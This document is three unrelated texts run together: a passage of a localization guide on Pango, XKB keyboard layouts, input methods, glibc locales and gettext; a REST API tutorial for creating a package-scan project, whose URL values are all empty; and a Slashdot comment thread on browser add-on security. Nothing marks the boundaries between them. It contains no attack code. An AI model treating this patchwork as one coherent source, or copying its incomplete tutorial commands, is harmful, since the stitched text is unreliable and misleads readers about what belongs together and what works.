- Itemize. Breaks input text into chunks (items) of consistent direction and shaping engine. This usually means chunks of text in the same language with the same font. Corresponding shaping and language engines are also associated with the items.
- Break. Determines possible line, word and character breaks within the given text item. It calls the language engine of the item (or the default engine based on Unicode data if no language engine exists) to analyze the logical attributes of the characters (is-line-break, is-char-break, etc.).
- Shape. Converts the text item into glyphs, with proper positioning.
It calls the shaping engine of the item (or the default shaping engine, currently suitable for European languages) to obtain a glyph string that provides the information required to render the glyphs (code point, width, offsets, etc.).

Pango Engines

Pango engines are implemented in loadable modules that provide entry functions for querying and creating the desired engine. During initialization, Pango queries the list of all engines installed in the memory. Then, when it itemizes input text, it also searches the list for the language and shaping engines available for the script of each item and creates them for association with the relevant text item.

Pango Language Engines

As discussed above, the Pango language engine is called to determine possible break positions in a text item of a certain language. It provides a method to analyze the logical attributes of every character in the text, as listed in Table 3.

Pango Shaping Engines

As discussed above, the Pango shaping engine converts characters in a text item in a certain language into glyphs, and positions them according to the script constraints. It provides a method to convert a given text string into a sequence of glyph information (glyph code, width and positioning) and a logical map that maps the glyphs back to character positions in the original text. With all this information, the text can be properly rendered on output devices, as well as accessed by the cursor, despite the difference between logical and rendering order in some scripts like Indic, Hebrew and Arabic.

Qt Text Layout

Qt 3 text rendering is different from that of GTK+/Pango. Instead of modularizing, it handles all complex text rendering in a single class, called QComplexText, which is mostly based on the Unicode character database. This is equivalent to the default routines provided by Pango. Due to the incompleteness of the Unicode database, this class sometimes needs extra workarounds to override some values.
Developers should examine this class if a script is not rendered properly. Although relying on the Unicode database appears to be a straightforward method for rendering Unicode text, it makes the class rigid and error-prone. Checking the Qt Web site regularly to find out whether there are bugs in the latest versions is advisable. However, a big change is planned for Qt 4: the Scribe text layout engine, similar to Pango for GTK+.

Input Methods

The needs of keyboard maps and input methods have been discussed on page 37. This section will further discuss how to implement them, beginning with keyboard layouts. Pages 37-38 also mention that XIM is the current basic input method framework for X Window. Only Qt 3 relies on it, while GTK+ 2 defines its own input method framework. Both XIM and GTK+ IM are discussed here.

Keyboard Layouts

The first step in providing text input for a particular language is to prepare the keyboard map. X Window handles the keyboard map using the X Keyboard (XKB) extension. When you start an X server on GNU/Linux, a virtual terminal is attached to it in raw mode, so that keyboard events are sent from the kernel without any translation. The raw scan code of the key is then translated into a keycode according to the keyboard model. For XFree86 on PC, the keycode map is usually "xfree86", as kept under the /etc/X11/xkb/keycodes directory. The keycodes just represent the key positions in symbolic form, for further referencing. The keycode is then translated into a keyboard symbol (keysym) according to the specified layout, such as qwerty, dvorak, or a layout for a specific language, chosen from the data under the /etc/X11/xkb/symbols directory. A keysym does not represent a character yet. It requires an input method to translate sequences of key events into characters, which will be described later. For XFree86, all of the above setup is done via the setxkbmap command.
(Setting up values in /etc/X11/XF86Config means setting parameters for setxkbmap at initial X server startup.) There are many ways of describing the configuration, as explained in Ivan Pascal's XKB explanation. [16] The default method for XFree86 4.x is the "xfree86" rule (XKB rules are kept under /etc/X11/xkb/rules), with additional parameters:

- model - pc104, pc105, microsoft, microsoftplus, ...
- layout - us, dk, ja, lo, th, ... (for XFree86 4.0+, up to 64 groups can be provided as part of the layout definition)
- variant - (mostly for Latins) nodeadkeys
- option - group switching key, swap caps, LED indicator, etc. (see /etc/X11/xkb/rules/xfree86 for all available options)

For example:

$ setxkbmap us,th -option grp:alt_shift_toggle,grp_led:scroll

sets a layout using US symbols as the first group and Thai symbols as the second group. The Alt-Shift combination is used to toggle between the two groups. The Scroll Lock LED will be the group indicator, on when the current group is not the first group; that is, on for Thai, off for US. You can even mix more than two languages:

$ setxkbmap us,th,lo -option grp:alt_shift_toggle,grp_led:scroll

This loads a trilingual layout. Alt-Shift is used to rotate among the three groups; that is, Alt-RightShift chooses the next group and Alt-LeftShift chooses the previous group. The Scroll Lock LED will be on when the Thai or Lao group is active.

The arguments for setxkbmap can be specified in /etc/X11/XF86Config for initialization on X server startup by describing the "InputDevice" section for the keyboard, for example:

Section "InputDevice"
    Identifier "Generic Keyboard"
    Driver "keyboard"
    Option "CoreKeyboard"
    Option "XkbRules" "xfree86"
    Option "XkbModel" "microsoftplus"
    Option "XkbLayout" "us,th_tis"
    Option "XkbOptions" "grp:alt_shift_toggle,lv3:switch,grp_led:scroll"
EndSection

Notice the last four option lines.
They tell setxkbmap to use the "xfree86" rule, with the "microsoftplus" model (with Internet keys), a mixed layout of US and Thai TIS-820.2538, and some more options for the group toggle key and LED indicator. The "lv3:switch" option is only for keyboard layouts that require a 3rd level of shift (that is, one more than the normal shift keys). In this case, for "th_tis" in XFree86 4.4.0, this option sets RightCtrl as the 3rd level of shift.

Providing a Keyboard Map

If the keyboard map for a language is not available, one needs to prepare a new one. In XKB terms, one needs to prepare a symbols map, associating keysyms to the available keycodes. The quickest way to start is to read the available symbols files under the /etc/X11/xkb/symbols directory. In particular, the files used by the default rules of XFree86 4.3.0 are under the pc/ subdirectory. Here, only one group is defined per file, unlike the old files in its parent directory, in which groups are pre-combined. This is because XFree86 4.3.0 provides a flexible method for mixing keyboard layouts. Therefore, unless you need to support old versions of XFree86, all you need to do is prepare a single-group symbols file under the pc/ subdirectory. Here is an excerpt from the th_tis symbols file:

partial default alphanumeric_keys
xkb_symbols "basic" {
    name[Group1]= "Thai (TIS-820.2538)";
    // The Thai layout defines a second keyboard group and changes
    // the behavior of a few modifier keys.
    key <TLDE> { [ 0x1000e4f, 0x1000e5b ] };
    key <AE01> { [ Thai_baht, Thai_lakkhangyao ] };
    key <AE02> { [ slash, Thai_leknung ] };
    key <AE03> { [ minus, Thai_leksong ] };
    key <AE04> { [ Thai_phosamphao, Thai_leksam ] };
    ...
};

Each element in the xkb_symbols data, except the first one, is the association of keysyms to the keycode for unshift and shift versions, respectively. Here, some keysyms are predefined in Xlib. You can find the complete list in <X11/keysymdef.h>.
If the keysyms for a language are not defined there, the Unicode keysyms can be used, as shown in the <TLDE> key entry. (In fact, this may be a more effective way of adding new keysyms.) The Unicode value must be prefixed with "0x100" to describe the keysym for a single character. For more details of the file format, see Ivan Pascal's XKB explanation. [17] When finished, the symbols.dir file should be regenerated so that the symbols file is listed:

# cd /etc/X11/xkb/symbols
# xkbcomp -lhlpR '*' -o ../symbols.dir

Then, the new layout may be tested as described in the previous section. Additionally, entries may be added to /etc/X11/xkb/rules/xfree86.lst so that some GUI keyboard configuration tools can see the layout. Once the new keyboard map is completed, it may also be included in the XFree86 source, where the data for XKB are kept under the xc/programs/xkbcomp subdirectory.

XIM - X Input Method

For some languages, such as English, text input is as straightforward as a one-to-one mapping from keysyms to characters. For European languages, this is a little more complicated because of accents. But for Chinese, Japanese and Korean (CJK), the one-to-one mapping is impossible. They require a series of keystroke interpretations to obtain each character. X Input Method (XIM) is a locale-based framework designed to address the requirements of text input for any language. It is a separate service for handling input events as requested by X clients. Any text entry in X clients is represented by an X Input Context (XIC). All keyboard events are propagated to the XIM, which determines the appropriate action for the events based on the current state of the XIC, and passes back the resulting characters. Internally, a common process of every XIM is to translate the keyboard scan code into a keycode and then to a keysym, by calling XKB, as described in previous sections.
The subsequent steps, which convert keysyms into characters, differ from locale to locale. XIM is usually implemented using a client-server model. A more detailed discussion of XIM implementation is beyond the scope of this document; please see Section 13.5 of the Xlib document [18] and the XIM protocol [19] for more information.

In general, users can choose their favourite XIM server by setting the XMODIFIERS environment variable, like this:

$ export LANG=th_TH.TIS-620
$ export XMODIFIERS="@im=Strict"

This specifies the Strict input method for the Thai locale.

GTK+ IM

As a cross-platform toolkit, GTK+ 2 defines its own input method framework using pure GTK+ APIs, instead of relying on the input methods of each operating system. This provides a high level of abstraction, making input method development a lot easier than writing XIM servers. GTK+ can still use the existing XIM servers through the imxim bridging module. Moreover, input methods developed this way become immediately available to GTK+ on all the platforms it supports, including XFree86, Windows, and the GNU/Linux framebuffer console. The only drawback is that the input methods cannot be shared with non-GTK+ applications.

Client Side

A normal GTK+ text entry widget provides an "Input Methods" context menu, opened by right-clicking within the text area, which lists all installed GTK+ IM modules for the user to choose from. The menu is initialized by querying all installed modules for the engines they provide.

From the client's point of view, each text entry is represented by an IM context, which communicates with the IM module after every key press event by calling a key filter function provided by the module. This allows the IM to intercept key presses and translate them into characters. Non-character keys, such as function keys or control keys, are not usually intercepted; this allows the client to handle special keys, such as shortcuts.
There are also interfaces for the other direction: the IM can request actions from the client by emitting GLib signals, for which the client may provide handlers by connecting callbacks to the signals:

- "preedit_changed" - The uncommitted (pre-edit) string has changed. The client may update the display, but not the input buffer, to let the user see the keystrokes.
- "commit" - Some characters are committed from the IM. The committed string is passed along so that the client can take it into its input buffer.
- "retrieve_surrounding" - The IM wants to retrieve some text around the cursor.
- "delete_surrounding" - The IM wants to delete the text around the cursor. The client should delete the text portion around the cursor as requested.

IM Modules

GTK+ input methods are implemented as loadable modules that provide entry functions for querying and creating the desired IM context; these are used to interface with the "Input Methods" context menu in text entry areas. An IM module defines one or more new IM context classes and provides filter functions to be called by the client upon key press events. It determines the proper action for each key and returns TRUE if it means to intercept the event, or FALSE to pass the event back to the client.

Some IMs (e.g., CJK and European ones) perform a stateful conversion, incrementally matching the input string against predefined patterns and committing the converted string once a unique pattern has been matched. During the partial matching, the IM emits the "preedit_changed" signal to the client on every change, so that the client can update the pre-edit string on the display. Finally, to commit characters, the IM emits the "commit" signal on the IM context, with the converted string as the argument.

Some IMs (e.g., Thai) are context-sensitive: they need to retrieve the text around the cursor to determine the appropriate action. This can be done through the "retrieve_surrounding" signal.
In addition, the IM may request that some text be deleted from the client's input buffer, as required by the advanced Thai IM, which uses this to correct illegal sequences. This is done via the "delete_surrounding" signal.

Locales

As mentioned earlier, the GNU C library is internationalized according to POSIX and ISO/IEC 14652. Both are discussed in this section.

Locale Naming

A locale is described by its language, country and character set. The naming convention given in the OpenI18N guideline [20] is:

lang_territory.codeset[@modifiers]

where

- lang is a two-letter language code defined in ISO 639:1988. Three-letter codes from ISO 639-2 are also allowed in the absence of a two-letter version. The ISO 639-2 Registration Authority at the Library of Congress [21] has a complete list of language codes.
- territory is a two-letter country code defined in ISO 3166-1:1997. The list of two-letter country codes is available online from the ISO 3166 Maintenance Agency. [22]
- codeset describes the character set used in the locale.
- modifiers add more information to the locale by setting options (turning flags on, or using an equal sign to set values). Options are separated by commas. This part is optional and implementation-dependent; different I18N frameworks provide different options.

For example:

- fr_CA.ISO-8859-1 = French language in Canada using the ISO-8859-1 character set
- th_TH.TIS-620 = Thai language in Thailand using the TIS-620 encoding

If territory or codeset is omitted, default values are usually resolved by means of locale aliasing. Note that for the GNU/Linux desktop, the modifiers part is not supported yet; locale modifiers for the X Window System are set through the XMODIFIERS environment variable instead.

Character Sets

A character set is part of the locale definition. It defines all the characters in the set, as well as how they are encoded for information interchange. In the GNU C library (glibc), locales are described in terms of Unicode.
A new character set is described as a Unicode subset, with each element associated with the byte string that encodes it in the target character set. For example, the UTF-8 encoding is described like this:

...
<U0041> /x41 LATIN CAPITAL LETTER A
<U0042> /x42 LATIN CAPITAL LETTER B
<U0043> /x43 LATIN CAPITAL LETTER C
...
<U0E01> /xe0/xb8/x81 THAI CHARACTER KO KAI
<U0E02> /xe0/xb8/x82 THAI CHARACTER KHO KHAI
<U0E03> /xe0/xb8/x83 THAI CHARACTER KHO KHUAT
...

The first column is the Unicode value; the second is the encoded byte string; the rest is a comment. As another example, the TIS-620 encoding for Thai is a simple single-byte 8-bit encoding. The first half of the code table is the same as ASCII, and the second half encodes Thai characters beginning at 0xA1. Therefore, the character map looks like this:

...
<U0041> /x41 LATIN CAPITAL LETTER A
<U0042> /x42 LATIN CAPITAL LETTER B
<U0043> /x43 LATIN CAPITAL LETTER C
...
<U0E01> /xa1 THAI CHARACTER KO KAI
<U0E02> /xa2 THAI CHARACTER KHO KHAI
<U0E03> /xa3 THAI CHARACTER KHO KHUAT
...

POSIX Locales

According to POSIX, standard C library functions are internationalized according to the following categories: LC_CTYPE, LC_COLLATE, LC_TIME, LC_NUMERIC, LC_MONETARY and LC_MESSAGES.

Setting Locale

A C application can set the current locale with the setlocale() function (declared in <locale.h>). The first argument indicates the category to be set; LC_ALL can be used to set all categories at once. The second argument is the name of the locale to use, or the empty string ("") to rely on the system environment settings. The initialization of a typical internationalized C program may therefore appear as follows:

#include <locale.h>
...
const char *prev_locale;
prev_locale = setlocale (LC_ALL, "");

With the empty string, the system environment is examined to determine the appropriate locale, as follows:

- If LC_ALL is defined, it shall be used as the locale name.
- Otherwise, if the corresponding values of LC_CTYPE, LC_COLLATE, LC_MESSAGES are defined, they shall be used as the locale names for the corresponding categories.
- Otherwise, for categories still undefined, if LANG is defined, it is used as the locale name.
- For categories that are still undefined after all the above checks, the "C" (or "POSIX") locale shall be used.

The "C" or "POSIX" locale is a dummy locale in which all behaviours are C defaults (e.g. ASCII sorting for LC_COLLATE).

LC_CTYPE

LC_CTYPE defines character classification for the functions declared in <ctype.h>:

- iscntrl()
- isspace()
- isalpha()
- islower()
- toupper()
- isgraph()
- ispunct()
- isdigit()
- isupper()
- isprint()
- isalnum()
- isxdigit()
- tolower()

Since glibc is Unicode-based, and all character sets are defined as Unicode subsets, it makes no sense to redefine character properties in each locale. Typically, the LC_CTYPE category in most locale definitions refers to the default definition (called "i18n").

LC_COLLATE

The C functions affected by LC_COLLATE are strcoll() and strxfrm().

- strcoll() compares two strings in a manner similar to strcmp(), but in a locale-dependent way. (Note that the behaviour of strcmp() itself never changes under different locales.)
- strxfrm() transforms a string into a form that can be compared using plain strcmp() to give the same result as comparing the original strings with strcoll().

The LC_COLLATE specification is the most complicated of all the locale categories. There is a separate standard for collating Unicode strings, ISO/IEC 14651 International String Ordering. [23] The glibc default locale definition is based on this standard. Locale developers should consider investigating the Common Tailorable Template (CTT) defined there before beginning their own locale definition.

In the CTT, collation is done in multiple passes. Character weights are defined at multiple levels (four levels for ISO/IEC 14651). Some characters can be ignored (by using "IGNORE" as the weight) in early passes and brought into consideration in later passes for finer adjustment. Please see the ISO/IEC 14651 document for more details.
LC_TIME

LC_TIME allows localization of date/time strings formatted by the strftime() function: the names of the days of the week and of the months can be translated into the locale language, and dates can be rendered in the locally appropriate format.

LC_NUMERIC & LC_MONETARY

Each culture uses different conventions for writing numbers, namely the decimal point, the thousands separator and digit grouping; this is covered by LC_NUMERIC. LC_MONETARY defines the currency symbols used in the locale, as per ISO 4217, as well as the format in which monetary amounts are written. A single function, localeconv() in <locale.h>, retrieves the information from both locale categories. Glibc provides an extra function, strfmon() in <monetary.h>, for formatting monetary amounts as per LC_MONETARY, but this is not a standard C function.

LC_MESSAGES

LC_MESSAGES is mostly used for message translation purposes. Its only use in the POSIX locale is describing the yes/no answers for the locale.

ISO/IEC 14652

The ISO/IEC 14652 specification method for cultural conventions is basically an extended POSIX locale specification. In addition to the details in each of the six POSIX categories, it introduces six more: LC_PAPER, LC_NAME, LC_ADDRESS, LC_TELEPHONE, LC_MEASUREMENT and LC_IDENTIFICATION. All of these categories are supported by glibc. C applications can retrieve all locale information using the nl_langinfo() function.

Building Locales

To build a locale, a locale definition file describing the data for the ISO/IEC 14652 locale categories must be prepared. (See the standard document for the file format.) In addition, when defining a new character set, a charmap file must be created for it; this gives every character a symbolic name and describes the encoded byte strings. In general, glibc uses UCS symbolic names (<Uxxxx>) in locale definitions, for convenience in generating locale data for any charmap. The actual locale data used by C programs is in binary form.
The locale definition must be compiled with the localedef command, which accepts arguments like this:

localedef [-f <charmap>] [-i <input>] <name>

For example, to build the th_TH locale from the locale definition file th_TH using the TIS-620 charmap:

# localedef -f TIS-620 -i th_TH th_TH

The charmap file may be installed in the /usr/share/i18n/charmaps directory, and the locale definition file in the /usr/share/i18n/locales directory, for further reference. The locale command can be used with the "-a" option to list all installed locales, and with the "-m" option to list the supported charmaps. Issued without arguments, it shows the locale categories selected by the current environment settings.

Translation

The translation framework most commonly used in FOSS is GNU gettext, although some cross-platform FOSS projects, such as AbiWord, Mozilla and OpenOffice.org, use their own frameworks as a result of their cross-platform abstractions. This section briefly discusses GNU gettext, which covers more than 90 percent of GNU/Linux desktops; the concepts, however, apply to the other frameworks as well.

Messages in program source code are wrapped in a short macro that calls a gettext function to retrieve the translated version. At program initialization, the hashed message database corresponding to the LC_MESSAGES locale category is loaded; then, all messages covered by the macros are translated by quick lookups during program execution. The task of translation is therefore to build the message translation database for a particular language and install it in the appropriate place for the locale. With that preparation, gettext-based programs are automatically translated according to the locale setting, without having to touch the source code.

GNU gettext also provides tools for creating the message database. Two kinds of files are involved in the process:

- PO (Portability Object) file. This is a file in human-readable form for the translators to work with.
It is named so because of its plain-text nature, which makes it portable to other platforms.
- MO (Machine Object) file. This is a hashed database for machines to read, in the final format loaded by gettext-based programs. There are many translation frameworks in commercial Unices, and their MO files are not compatible with one another. One may also find GMO files as intermediate output from the GNU gettext tools; they are MO files containing some GNU gettext enhanced features.

The important GNU gettext tools are best described by summarizing the steps of a translation from scratch (see Figure 3):

- Extract the messages with the xgettext utility. What you get is the "package.pot" file, a template for the PO file.
- Create the PO file for your language from the template, either by copying it to "xx.po" (where xx is your language code) and filling in the header information, or by using the msginit utility.
- Translate the messages by editing the PO file with your favourite text editor. Specialized editors for PO files, such as KBabel and Gtranslator, are also available.
- Convert the PO file into an MO file using the msgfmt utility.
- Install the MO file under the LC_MESSAGES directory of your locale.
- As the program develops, new strings are introduced. You need not begin from scratch again: extract a new PO template with the xgettext utility as usual, then merge the template with your current PO file using the msgmerge utility. You can then continue by translating only the new messages.

GNOME intltool

GNU/Linux desktops have more things to translate than messages in C/C++ source code. System menu entries and lists of event sounds, for example, also contain messages, mostly in XML formats not supported by GNU gettext. One may dig into these individual files to translate the messages, but this is very inconvenient to maintain and error-prone.

KDE has a strong policy for translation.
PO files for all KDE core applications are extracted into a single directory for each language, so that translators can work in a single place to translate the desktop, without needing a copy of the source code. (In practice, one still needs to look into the sources occasionally to verify the exact meaning of some messages, especially error messages.) This collection already includes all the messages outside the C++ sources mentioned above.

GNOME takes a different approach. The PO files are still placed in the source tree under the "po" subdirectory as usual, but instead of using xgettext directly to extract messages from the source, the GNOME project has developed an automatic tool called intltool. This tool extracts messages from the XML files into the PO template, along with the usual things xgettext does, and merges the translations back as well. As a result, despite the heterogeneous translation system, all translators need to do is still edit a single PO file for a particular language.

The use of intltool is easy. To generate a PO template, change into the "po" subdirectory and run:

$ intltool-update --pot

To generate a new PO file and merge it with an existing translation:

$ intltool-update xx

where xx is the language code. That is all that is required; editing the PO file can then proceed as usual. When PO editing is complete, the usual installation process of a typical GNOME source tree automatically calls the appropriate intltool command to merge the translations back into those XML files before installing. Note that, with this automated system, one should not call the xgettext and msgmerge commands directly any more.

The following sites and documents provide more information on KDE and GNOME translation:

- KDE Internationalization Home
- The KDE Translation HOWTO
- The GNOME Translation Project
- Localizing GNOME Applications
- How to Use GNOME CVS as a Translator

PO Editors

A PO file is a plain text file.
It can therefore be edited with any text editor. But, as stated earlier, translation is a labour-intensive task, and it is worth considering some convenient tools to speed up the job. Normally, the editor needs to be able to edit UTF-8, as both KDE and GNOME now use it as their standard text encoding. The following tools offer many other features besides.

KBabel

Part of the KDE Software Development Kit, KBabel is an advanced and easy-to-use editor for PO files, with full navigation and editing capabilities, syntax checking and statistics. The editor separates translated, untranslated and fuzzy messages, so that it is easy to find and edit the unfinished parts. KBabel also provides CatalogManager, which allows keeping track of many PO files at once, and KBabelDict for maintaining the glossary, which is important for translation consistency, especially among team members from different backgrounds.

Gtranslator

Gtranslator is the PO file editor for the GNOME desktop. It is very similar to KBabel in core functionality. Gtranslator also supports auto-translation, in which translations are learnt into its memory and can be applied in later translations using a hot key.

Footnotes

- ↑ UCS is the acronym for Universal multi-octet coded Character Set.
- ↑ UTF is the acronym for Unicode (UCS) Transformation Format.
- ↑ The Unicode Consortium. The Unicode Standard, Version 4.0, pp. 76-77.
- ↑ The Unicode Consortium. The Unicode Standard, Version 4.0, pp. 77-78.
- ↑ Ibid., pp. 95-104.
- ↑ Unicode.org, 'Unicode Technical Reports'.
- ↑ Unicode.org, 'Unicode Technical Reports'.
- ↑ Leisher, M., 'The XmBDFEd Font Editor'; available from crl.nmsu.edu/~mleisher/xmbdfed.html
- ↑ Williams, G., 'PfaEdit'.
- ↑ Just van Rossum, 'TTX/FontTools'.
- ↑ Note the difference from Microsoft's "Windows" trademark: X Window is without the 's'.
- ↑ Taylor, O., 'Pango'.
- ↑ Taylor, O., 'Pango - Design'.
- ↑ GNOME Development Site, 'Pango Reference Manual'.
- ↑ This is a very rough classification. Obviously there are further steps, such as line breaking, alignment and justification; they need not be discussed here, as they go beyond localization.
- ↑ Pascal, I., X Keyboard Extension.
- ↑ Pascal, I., X Keyboard Extension.
- ↑ Gettys, J., Scheifler, R.W., Xlib - C Language X Interface, X Consortium Standard, X Version 11 Release 6.4.
- ↑ Narita, M., Hiura, H., The Input Method Protocol, Version 1.0. X Consortium Standard, X Version 11 Release 6.4.
- ↑ OpenI18N.org, OpenI18N Locale Name Guideline, Version 1.1, 2003-03-11.
- ↑ Library of Congress, ISO 639-2 Registration Authority.
- ↑ ISO, ISO 3166 Maintenance Agency (ISO 3166/MA) - ISO's focal point for country codes.
- ↑ ISO/IEC, ISO/IEC JTC1/SC22/WG20 - Internationalization; ISO/IEC 14651 International String Ordering.
Analyse Package Archive (REST API)

This tutorial complements the REST API section; the aim here is to show the API features while analyzing a package archive.

Tip
As a prerequisite, check our REST API chapter for more details on the REST API and how to get started.

Instructions: First, let's create a new project called boolean.py-3.8. We'll be using this package as the project input, and we'll add and execute the scan_package pipeline on our new project.

Note
Whether you follow this tutorial and the previous instructions using cURL or a Python script, the final results should be the same.

Using cURL

In your terminal, insert the following:

api_url=""
content_type="Content-Type: application/json"
data='{
  "name": "boolean.py-3.8",
  "input_urls": "",
  "pipeline": "scan_package",
  "execute_now": true
}'
curl -X POST "$api_url" -H "$content_type" -d "$data"

Note
You have to set the api_url to if you run on a local development setup.

Tip
You can provide the data using a JSON file with the text below, which will be passed in the -d parameter of the curl request:

{
  "name": "boolean.py-3.8",
  "input_urls": "",
  "pipeline": "scan_package",
  "execute_now": true
}

While in the same directory as your JSON file, here called boolean.py-3.8_cURL.json, create your new project with the following curl request:

curl -X POST "" -H "Content-Type: application/json" -d @boolean.py-3.8_cURL.json

If the new project has been successfully created, the response should include the project's details URL value among the returned data:

{
  "name": "boolean.py-3.8",
  "url": "",
  "[...]": "[...]"
}

If you click on the project url, you'll be directed to the new project's instance page, which allows you to perform extra actions on the project, including deleting it.

Using Python script

Tip
To interact with REST APIs, we will be turning to the requests library.

To follow the above instructions and create a new project, start up the Python interpreter by typing python in your terminal.
If you are seeing the prompt >>>, you can execute the following commands:

import requests

api_url = ""
data = {
    "name": "boolean.py-3.8",
    "input_urls": "",
    "pipeline": "scan_package",
    "execute_now": True,
}
response = requests.post(api_url, data=data)
response.json()

The JSON response includes a generated UUID for the new project:

# print(response.json())
{
    "name": "boolean.py-3.8",
    "url": "",
    "[...]": "[...]",
}

Note
Alternatively, you can put the above commands in a Python script, then navigate to the same directory as the file and run it to create your new project. In that case, no response will be shown on the terminal; to access a given project's details, you need to visit the project's API endpoint.
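If you create projects like this repeatedly, it can help to factor out the payload construction. The sketch below does that with a hypothetical helper, build_project_payload(); the helper name and the example archive URL are illustrative assumptions, while the field names (name, input_urls, pipeline, execute_now) are the ones used throughout this tutorial.

```python
# Hypothetical helper: build the JSON payload for creating a
# project, using the field names shown in this tutorial.
def build_project_payload(name, input_url, pipeline, execute_now=True):
    return {
        "name": name,
        "input_urls": input_url,
        "pipeline": pipeline,
        "execute_now": execute_now,
    }

if __name__ == "__main__":
    payload = build_project_payload(
        "boolean.py-3.8",
        "https://files.example.org/boolean.py-3.8.tar.gz",  # placeholder URL
        "scan_package",
    )
    print(payload)
```

Posting the payload is then done with requests.post(api_url, data=payload), exactly as in the interpreter session above.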
Microsoft Blames Add-Ons For Browser Woes 307 darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?" Duh (Score:5, Insightful) Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"? !news I'll still blame you for everything else. (Score:5, Insightful) Re:I'll still blame you for everything else. (Score:5, Informative) Re:I'll still blame you for everything else. (Score:5, Funny) That would be an add-on problem. Re: (Score:2, Interesting) Re: (Score:2, Insightful) To be fair to Microsoft (And a disclaimer, I primarily use Opera myself): -I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot. -IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browse Re:I'll still blame you for everything else. (Score:5, Funny) (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it) Much more needed is "-1, Reverse psychology" (runner-up is "+1, your uid is prime") Re:I'll still blame you for everything else. 
(Score:5, Informative) IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out. Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart." So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent. But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away. Re: (Score:3, Informative) Definitely. Definitely! The Acid tests are not an indicator of standards compliance. 
They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall. Re:I'll still blame you for everything else. (Score:4, Funny) definately Definitely. Definitely! People are going to write they way the write irregardless of your protests. You should of just, like, totally ignored him. Permissions (Score:5, Insightful) Re:Permissions (Score:5, Interesting) Re:Permissions (Score:5, Informative) Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself. Re: (Score:2, Informative) What about kde-gnash? (Score:5, Informative) There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was. You are right that konqueror does not crash the whole computer, but that's still very far from the desired result. Re: (Score:2) Except when it doesn't. Re:Permissions (Score:5, Insightful) Just in case anyone was going to interpret this literally: Ideally, most of these plugins should be setuid as nobody No, no, a thousand times no! I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move. These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process. 
The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin. In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag. But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now! Re:Permissions (Score:5, Insightful) I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!? Re: (Score:3, Informative) Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!? Was there a time when plug-ins couldn't have access to the harddrive? Re: (Score:3, Insightful) Why do Mac users and Linux users manage to avoid most of this shit? I think there are two reasons 1: there is simply less shit availible for thier platform 2: mac and linux users tend to be more experianced and discerning. Nearly all newbies use windows? Re:Permissions (Score:5, Interesting) Re: (Score:2) Re:Permissions (Score:5, Insightful) Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.? Should it even be possible for add-ons to do this? 
